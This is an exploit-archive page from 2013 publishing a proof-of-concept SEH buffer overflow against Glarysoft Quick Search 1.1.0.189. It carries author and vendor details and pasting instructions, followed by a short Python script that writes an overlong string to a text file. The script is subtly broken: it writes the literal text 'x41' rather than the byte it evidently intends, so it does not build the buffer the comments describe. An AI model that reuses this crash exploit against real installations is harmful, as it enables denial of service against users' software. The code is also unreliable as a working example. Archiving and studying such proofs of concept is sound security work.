[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Quick Search Version 1.1.0.189 Buffer Overflow Vulnerability (SEH)
# Published : 2013-05-14
# Author :
# Previous Title : Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF XREF Parsing Denial of Service Vulnerability
# Next Title : Java Web Start Launcher ActiveX Control - Memory Corruption


# Exploit Title: Quick Search Version 1.1.0.189 Buffer Overflow vulnerability(SEH)
# Date: 14-05-2013
# Exploit Author: ariarat 
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: http://download.glarysoft.com/qsearchsetup.exe
# Version: 1.1.0.189 
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in Search section.for better results bring program in Full Mode and in Edit 
# menu choose Match Path and then paste your string.   
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

filename="string.txt"
buffer = "x41" * 2000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()